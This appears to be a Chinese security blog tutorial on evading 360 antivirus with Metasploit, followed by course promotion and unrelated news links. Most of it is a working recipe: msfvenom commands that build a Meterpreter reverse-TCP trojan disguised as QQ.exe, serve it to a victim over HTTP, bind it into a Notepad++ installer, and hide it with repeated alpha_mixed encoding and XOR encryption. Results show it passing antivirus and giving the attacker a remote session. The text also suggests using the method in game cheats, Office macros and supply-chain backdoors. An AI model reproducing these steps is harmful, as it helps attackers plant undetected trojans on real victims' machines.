2026最新免杀技巧,巧用MSF,过360最新版本
收藏必备从零开始学习免杀技术MSF实战绕过360安全卫士全攻略本文详细介绍了免杀技术的定义、原理与分类通过MSF框架实战演示了如何利用合法模板多重编码加密混淆技术绕过360安全卫士的静态与动态检测。实验证明这种组合式免杀策略可有效降低恶意程序被查杀的概率为红队渗透测试提供了实用技术参考同时也提醒蓝队需部署EDR等多层次防护体系。❝** 温馨提示**本文内容仅供安全研究、授权测试与防御技术学习严禁用于非法用途。一、为什么你要学“免杀”技术“免杀”是红蓝对抗、渗透测试中的对抗技术帮助红队人员绕过杀毒软件的检测帮助红队人员拿下蓝方人员的机器的控制权。即使在蓝队掌握免杀这门技术也能在样本的分析过程中大大提高木马的识别能力增加溯源的机会同时也是技术能力的重要组成部分需通过持续学习与实践来提升。本文主要针对360最新版使用msf进行绕过合法模板多重编码加密混淆看不懂在文章复现过程中将会详细的解释。一些相关的视频学习资源https://www.bilibili.com/video/BV1Fit2zpE6q二、什么是“免杀”2.1、定义免杀是通过修改恶意程序的代码结构或者特征绕过杀毒软件的检测绕过杀软的特征库的技术简称这通常是通过使用各种技巧来掩盖恶意代码的真实性质从而避免被安全软件发现和拦截。2.2、原理检测方式原理免杀应对策略静态特征检测比对文件哈希、代码片段、字符串等编码、加密、替换模板动态行为检测监控程序运行时的API调用、网络行为等混淆执行流程、延迟触发启发式分析基于行为模式推测恶意意图模仿合法程序行为2.3、常见的免杀技术免杀技术其实就那几套核心思路实战里管用的就那么几个第一个就是代码混淆比如修改某个函数中的变量名或者加入长字符把原本规整的代码搅合成一片让杀软识别不出来核心的代码逻辑或者你自己都识别出不来这就是代码混淆。第二加密解密把恶意代码裹一层密文静态扫的时候啥也查不到。等跑到目标机器上再解密还原成可执行的杀软反应过来都晚了。。。。。。。。更多的免杀方法欢迎师傅们来到评论区进行讨论接下来看看免杀的分类吧三、免杀的分类3.1、按是否掌握源代码开源免杀需获取病毒、木马源代码通过修改代码如调整执行流程、替换函数名等操作改变木马特征实现免杀对编程能力有一定的要求。手工免杀无需源代码仅操作可执行文件如.exe 等PE 文件通过修改二进制数据、加壳等改变静态特征适用于仅获取程序成品的场景。❝名词解释PE 文件是 Windows 系统专属的可执行文件格式简单说就是电脑上能直接运行的文件类型最常见的就是.exe应用程序还包括.dll动态链接库、.sys驱动文件等。3.2、按作用场景文件免杀与查杀杀毒软件不运行程序扫描文件静态信息如文件头、哈希值查杀文件免杀需修改这些静态信息规避检测。内存免杀与查杀程序运行后杀毒软件或专用工具扫描内存动态数据查杀内存免杀通过加密内存代码、混淆指令等隐藏特征避免动态检测。理解免杀的基本概念与分类后我们将通过一个实验来具体演示免杀技术的实现过程及其实际效果。四、MSF免杀实验4.1、环境配置攻击机Kali LinuxIP10.10.10.128靶机Windows Server 2016IP10.10.10.136安装 360 最新版网络模式NAT 模式确保两台机器互通❝**本文福利**实验镜像与工具包已整理可在公众号后台回复“MSF免杀”获取下载链接。4.2、攻击机创建反向监听器我们需要打开msf直到出现如下界面msfconsoleimage-20251009213834604搜索multi/handler模块并选择对应的模块也就是第七个❝️实战价值multi/handler主要作用是接收来自目标主机的反向连接如反向 Shell建立并管理与被渗透主机的交互会话以便后续执行命令、获取系统权限等渗透操作支持多种 payload 类型适配不同操作系统和攻击场景。search multi/handler use 7image-20251008134215136选择好了模块之后就要配置选项了使用下面这个命令查看反弹shell的配置项show optionsimage-20251008134525860从上图可以看到我们生成木马的payload和上图这个payload是不同的同时还需要配置一个本地监听的IP确保和你本地执行ip a命令的IP地址相同否则也可能造成反弹shell失败set payload windows/meterpreter/reverse_tcp # 设置payload set LHOST 10.10.10.128# 设置本地监听的地址也就是反弹shell的地址image-20251008135037230随后查看配置项全部已经准备完毕image-20251008134931759启动模块此时MSF就进入了监听状态run # 启动监听模块image-202510081351220844.3、攻击机生成木马在kali中新建一个终端使用 MSF 中的msfvenom工具默认参数生成反向连接木马无免杀处理,并设置好模块(-p)本地ip地址(lhost)以及端口(lport)msfvenom -p windows/meterpreter/reverse_tcp lhost10.10.10.128 lport4444 -f exe QQ.exeimage-20250925160732529❝**名词解释msfvenom**是 Metasploit 框架里的工具能把攻击代码payload和正常程序结合生成带恶意功能的文件如 exe、apk用来测试系统是否容易被入侵。可以理解为木马生成工具此时执行ls -l可以看到在当前目录会生成一个命名为QQ.exe的木马程序。ls -l80214c7b-6952-4335-9f26-4cd0a39a83cc在生成木马的目录中打开http服务器便于目标机受害者通过此服务下载木马程序QQ.exe在当前终端执行如下命令python -m http.servera025776b-3d8c-45d6-8b2c-123aae519393不要忘记放行指定的端口否则会造成反弹shell失败apt install ufw # 一个linux的防火墙管理工具 ufw allow 8000/tcp # 放行8000端口允许tcp流量访问image-20250925161738441❝**我的经验**记得当初刚开始学网络安全的时候就老会忘记放行防火墙的端口造成不必要的时间浪费总会去想我明明是按照文章的步骤去复现的但是就是复现不出来为什么它能连接我不能折腾半天原来是防火墙端口没放行或者防火墙没关我淦4.4、目标机下载木马打开目标机受害者的浏览器输入访问攻击机开启的http服务我们点击QQ.exe将他下载下来image-20250925162345029❝此时在下载QQ.exe 木马程序时如果下载保存路径选择默认的下载目录不会触发360安全卫士的查杀除非双击运行该木马程序。但是如果选择另存为其他路径如桌面则马上触发360安全卫士查杀。打开下载目录双击点击即可立马被查杀c42e8057-7852-47a2-b995-1086abb0c7e54.5、攻击机MSF编码免杀针对 360 的静态 动态检测逻辑可以设计三层免杀策略替换模板用正常程序如 Notepad 安装包作为载体隐藏恶意代码多重编码通过编码器改变恶意代码的二进制形态避开静态特征码加密混淆对代码进行加密处理让 360 动态分析时难以解码出原始恶意行为。4.5.1、替换模板下载正版 Notepad 安装包作为载体替代 MSF 默认模板减少被检测概率wget https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v7.8.5/npp.7.8.5.Installer.x64.exe526e43e2-59ff-4c5d-ba02-e0a7d7ef0f6b下载成功后使用命令ls -l可以看到当前目录下多出一个exe程序这个就是我们免杀需要的载体隐藏恶意代码ls -lfaed38c7-ee21-42c2-878e-b142e44de96b4.5.2、多重编码使用x86/alpha_mixed编码器对恶意代码进行 12 次编码并捆绑到 Notepad 模板msfvenom -p windows/meterpreter/reverse_tcp lhost10.10.10.128 lport4444 \ -e x86/alpha_mixed -x npp.7.8.5.Installer.x64.exe -i 12 -f exe -o npp.exe参数备注-e指定编码方式对攻击载荷进行重新编码-x指定木马捆绑在哪个可执行程序模版上-i指定对目标进行编码的次数多次编码理论上来讲有助于免杀-f指定MSF编码器输出的程序的格式-o指定处理完毕后的文件输出路径image-20250925172545639除了上面这个编码器之外我们还可以使用msfvenom查看其他的编码格式进行尝试msfvenom -l encoderimage-20250925165856618此时如果在目标机(受害者)下载该木马程序时无论下载保存目录是否为默认下载目录均不会触发360安全卫士的查杀。即成功绕过360的静态检测****然而一旦运行仍然还是会被查杀。image-202509251821440514.5.3、加密混淆在编码基础上增加 XOR 加密和更多迭代次数提升解码难度msfvenom -p windows/meterpreter/reverse_tcp lhost10.10.10.128 lport4444 \ -e x86/alpha_mixed -x npp.7.8.5.Installer.x64.exe -i 13 \ --encrypt xor --encrypt-key zhibangyang123 -f exe -o npp.exe❝我的经验密钥最好不要使用简单字符串建议组合大小写数字符号且长度超过12位。参数说明--encrypt xor用 XOR 算法加密恶意代码运行时才解密-i 13增加编码次数进一步混淆静态特征自定义密钥避免通用加密密钥被 360 识别。❝**名词解释XOR算法**异或加密是一种加密算法利用了计算机中的异或计算异或计算(符号记为 ‘^’)的原理是相同为 0不同为 1例如0 ^ 0 0 1 ^ 1 0 1 ^ 0 1 0 ^ 1 1由于 1 ^ 0 或 0 ^ 1 的结果都为 1因此****不能直接**由结果 1 推出原来的明文到底是 0 还是 1**达到保护明文的目的。4.5.4、目标机免杀验证360 实时防护文件下载、运行均无警报成功绕过静态 动态检测image-20250925193231005实际控制测试靶机运行 npp.exe 后攻击机成功获取 Meterpreter 会话刚开始反弹的shell中文是乱码需要使用chcp 65001切换成中文的编码并且可执行命令如查看文件、截图。image-20250925181925434360免杀了那么第三方的木马识别平台呢五、第三方免杀平台检验5.1 国家计算机病毒协同分析平台免杀测试做恶意程序测试时“免杀效果” 不能只靠自己电脑的杀毒软件判断第三方平台的检测结果更客观 国家计算机病毒协同分析平台官网http://110.41.132.165/是国内权威的检测平台能同时调用多个主流杀毒引擎很适合用来验证免杀效果。下面我就一步步说清楚测试过程和结果。在开始之前需要注意两点未做免杀的原始木马能被多少杀毒引擎识别经过免杀处理后识别率能下降多少免杀前未混淆http://110.41.132.165/打开这个网站后上传我们未混淆的木马程序QQ.exe等待检测image-20250925164548025免杀后混淆后同样的将免杀后的npp.exe上传等待检测msfvenom -p windows/meterpreter/reverse_tcp lhost10.10.10.128 lport4444 \ -e x86/alpha_mixed -x npp.7.8.5.Installer.x64.exe -i 13 \ --encrypt xor --encrypt-key zhibangyang123 -f exe -o npp.exeimage-20250925194827159从上面对比可以看到原本识别出木马的引擎有一半以上 “未报毒”说明这次的免杀处理确实生效了。虽然各种平台杀毒的检测强度都很强但也是不完全准确的只能作为参考无法保证扫描的文件绝对安全还是得多平台测试未做免杀处理的恶意程序几乎 100% 会被 360 及主流杀毒软件拦截。同样的在线沙箱平台还有很多比如微步在线、Freebuf云沙箱、腾讯威胁情报、360云沙箱、Virustotal等等每个平台检测的结果不同还是要多平台对比❝ 拓展思考本次实验中我们通过“合法模板 多重编码 加密混淆”的方式绕过360检测。这种组合式免杀思路实际上可应用于多种场景例如游戏外挂伪装将恶意代码注入正常游戏补丁或辅助工具中办公文档宏病毒利用正常Office模板携带恶意宏代码供应链攻击将后门植入合法软件安装包进行分发。此外如果目标系统部署了二次校验机制如哈希校验、数字签名验证我们也有相应的绕过方法例如签名伪造、内存补丁等。这些内容我们将在后续文章中详细讲解敬请关注。学习路径建议初学者可先从Virustotal开始了解多引擎检测逻辑进阶后可尝试微步在线进行威胁溯源最终结合多个平台结果形成自己的免杀评估体系。至此已经实验结束了最后来回顾一下讲了什么内容吧六、总结本次免杀成功的核心在于1、合法模板选择正规软件作为载体降低初始嫌疑2、多重编码改变二进制特征绕过静态扫描3、加密混淆增加动态分析难度绕过行为检测。如果你是蓝队或者安全运营安全服务人员那么就不要依赖单一的杀软应部署EDR、网络流量分析等多层防护需要加强对可以进程的行为进行监控❝名词解释EDREndpoint Detection and Response端点检测和响应是Gartner的安东·丘瓦金Anton Chuvakin创造的一个术语用来指代一种端点安全防护解决方案。它记录端点上的行为使用数据分析和基于上下文的信息检测来发现异常和恶意活动并记录有关恶意活动的数据使安全团队能够调查和响应事件。端点可以是员工终端PC或笔记本电脑、服务器、云系统、移动设备或物联网设备等。EDR解决方案通常提供威胁搜寻、检测、分析和响应功能。如果您在文章中遇到了什么问题欢迎在公众号的评论区留下您的宝贵意见作者将会一一解答实战心得在多次攻防演练中我发现免杀的本质是“对抗升级”。只有深入理解检测原理才能设计出有效的绕过方案。文章来自网上侵权请联系博主题外话黑客/网络安全学习路线今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。网络安全学习资源分享:下面给大家分享一份2025最新版的网络安全学习路线资料帮助新人小白更系统、更快速的学习黑客技术一、2025最新网络安全学习路线一个明确的学习路线可以帮助新人了解从哪里开始按照什么顺序学习以及需要掌握哪些知识点。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击我们把学习路线分成L1到L4四个阶段一步步带你从入门到进阶从理论到实战。L1级别:网络安全的基础入门L1阶段我们会去了解计算机网络的基础知识以及网络安全在行业的应用和分析学习理解安全基础的核心原理关键技术以及PHP编程基础通过证书考试可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。L2级别网络安全的技术进阶L2阶段我们会去学习渗透测试包括情报收集、弱口令与口令爆破以及各大类型漏洞还有漏洞挖掘和安全检查项目可参加CISP-PTE证书考试。L3级别网络安全的高阶提升L3阶段我们会去学习反序列漏洞、RCE漏洞也会学习到内网渗透实战、靶场实战和技术提取技术系统学习Python编程和实战。参加CISP-PTE考试。L4级别网络安全的项目实战L4阶段我们会更加深入进行实战训练包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握而L3 L4更多的是通过项目实战来掌握核心技术针对以上网安的学习路线我们也整理了对应的学习视频教程和配套的学习资料。二、技术文档和经典PDF书籍书籍和学习文档资料是学习网络安全过程中必不可少的我自己整理技术文档包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本书籍含电子版PDF三、网络安全视频教程对于很多自学或者没有基础的同学来说书籍这些纯文字类的学习教材会觉得比较晦涩难以理解因此我们提供了丰富的网安视频教程以动态、形象的方式展示技术概念帮助你更快、更轻松地掌握核心知识。网上虽然也有很多的学习资源但基本上都残缺不全的这是我自己录的网安视频教程上面路线图的每一个知识点我都有配套的视频讲解。四、网络安全护网行动/CTF比赛学以致用当你的理论知识积累到一定程度就需要通过项目实战在实际操作中检验和巩固你所学到的知识同时为你找工作和职业发展打下坚实的基础。五、网络安全工具包、面试题和源码“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等感兴趣的同学不容错过。面试不仅是技术的较量更需要充分的准备。在你已经掌握了技术之后就需要开始准备面试我们将提供精心整理的网安面试题库涵盖当前面试中可能遇到的各种技术问题让你在面试中游刃有余。如果你是要找网安方面的工作它们绝对能帮你大忙。这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的如果大家有好的题目或者好的见解欢迎分享。参考解析深信服官网、奇安信官网、Freebuf、csdn等内容特点条理清晰含图像化表示更加易懂。内容概要包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…**读者福利 |**CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击

相关新闻

Python用Seedream4.5图像生成模型API调用与多场景应用|附代码教程

Python用Seedream4.5图像生成模型API调用与多场景应用|附代码教程

全文链接:https://tecdat.cn/?p45047 原文出处:拓端数据部落公众号 专题:Seedream 4.5图像生成模型Python API实战指南 引言 在AI技术快速迭代的当下,图像生成已从实验室走向产业落地。从早期只能生成模糊轮廓,到…

2026/7/4 22:14:59 阅读更多 →
2026 网络安全大预测:AI 实战落地 100 + 行业攻防趋势全景报告

2026 网络安全大预测:AI 实战落地 100 + 行业攻防趋势全景报告

2026年网络安全预测:AI全面融入实战的100行业洞察 随着人工智能深度融入企业运营和网络犯罪武器库,2026年网络安全格局将呈现自主威胁、身份中心型攻击和加速数字化转型风险的空前交汇。来自顶尖安全公司、政府机构和研究机构的专家们提出了100多项关键预…

2026/7/3 22:42:48 阅读更多 →
深度解析知行之桥 EDI 系统的邮件通知体系

深度解析知行之桥 EDI 系统的邮件通知体系

在 EDI 自动化流程中,及时的告警通知是保障业务连续性的关键。作为一款专业的EDI软件,知行之桥提供了强大的邮件通知功能,帮助用户实时监控系统运行状态、业务流程异常和关键事件。通过邮件通知,用户可以及时响应潜在问题&#xf…

2026/5/17 6:49:51 阅读更多 →

最新新闻

Umi-OCR终极指南:免费离线文字识别软件的完整配置与优化教程

Umi-OCR终极指南:免费离线文字识别软件的完整配置与优化教程

Umi-OCR终极指南:免费离线文字识别软件的完整配置与优化教程 【免费下载链接】Umi-OCR OCR software, free and offline. 开源、免费的离线OCR软件。支持截屏/批量导入图片,PDF文档识别,排除水印/页眉页脚,扫描/生成二维码。内置多…

2026/7/4 22:12:22 阅读更多 →
postcss-write-svg:革命性CSS SVG编写工具,让图形开发效率提升10倍!

postcss-write-svg:革命性CSS SVG编写工具,让图形开发效率提升10倍!

postcss-write-svg:革命性CSS SVG编写工具,让图形开发效率提升10倍! 【免费下载链接】postcss-write-svg Write SVGs directly in CSS 项目地址: https://gitcode.com/gh_mirrors/po/postcss-write-svg 你是否厌倦了在CSS和SVG文件之间…

2026/7/4 22:12:21 阅读更多 →
3大架构优化策略:如何构建高可用AI网关服务

3大架构优化策略:如何构建高可用AI网关服务

3大架构优化策略:如何构建高可用AI网关服务 【免费下载链接】new-api A unified AI model hub for aggregation & distribution. It supports cross-converting various LLMs into OpenAI-compatible, Claude-compatible, or Gemini-compatible formats. A cent…

2026/7/4 22:12:21 阅读更多 →
Agent Skills技能发现机制:如何让AI助手智能匹配任务与技能

Agent Skills技能发现机制:如何让AI助手智能匹配任务与技能

Agent Skills技能发现机制:如何让AI助手智能匹配任务与技能 【免费下载链接】agentskills Specification and documentation for Agent Skills 项目地址: https://gitcode.com/GitHub_Trending/ag/agentskills Agent Skills是GitHub推荐项目精选(…

2026/7/4 22:10:20 阅读更多 →
RestFB实战教程:10个常见Facebook API操作示例

RestFB实战教程:10个常见Facebook API操作示例

RestFB实战教程:10个常见Facebook API操作示例 【免费下载链接】restfb RestFB is a simple and flexible Facebook Graph API client written in Java. 项目地址: https://gitcode.com/gh_mirrors/re/restfb 想要在Java应用中快速集成Facebook功能&#xff…

2026/7/4 22:10:20 阅读更多 →
如何搭建Leela Chess Zero环境?5分钟快速启动你的AI象棋之旅

如何搭建Leela Chess Zero环境?5分钟快速启动你的AI象棋之旅

如何搭建Leela Chess Zero环境?5分钟快速启动你的AI象棋之旅 【免费下载链接】leela-chess **MOVED TO https://github.com/LeelaChessZero/leela-chess ** A chess adaption of GCPs Leela Zero 项目地址: https://gitcode.com/gh_mirrors/le/leela-chess L…

2026/7/4 22:08:18 阅读更多 →

日新闻

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 正式发布,这是一个关键的安全修复版本,修复了多个方面的问题,还对部分功能进行了优化。 安全修复亮点 此次发布在安全修复上表现突出。binprot 避免了项目引用计数溢出,mcmc 因安全问题提升了上游版本号&#xf…

2026/7/4 0:04:29 阅读更多 →
终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案 【免费下载链接】HMCL A Minecraft Launcher which is multi-functional, cross-platform and popular 项目地址: https://gitcode.com/gh_mirrors/hm/HMCL HMCL(Hello Minecraft! Lau…

2026/7/4 0:06:29 阅读更多 →
KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

1. KMX63与PIC18F66K40的硬件协同架构解析KMX63作为一款三轴加速度计和磁力计组合传感器,与PIC18F66K40微控制器的搭配堪称嵌入式HMI开发的黄金组合。这套硬件组合的核心优势在于KMX63提供的高精度运动感知能力与PIC18F66K40强大的信号处理能力形成了完美互补。KMX6…

2026/7/4 0:06:29 阅读更多 →

周新闻

月新闻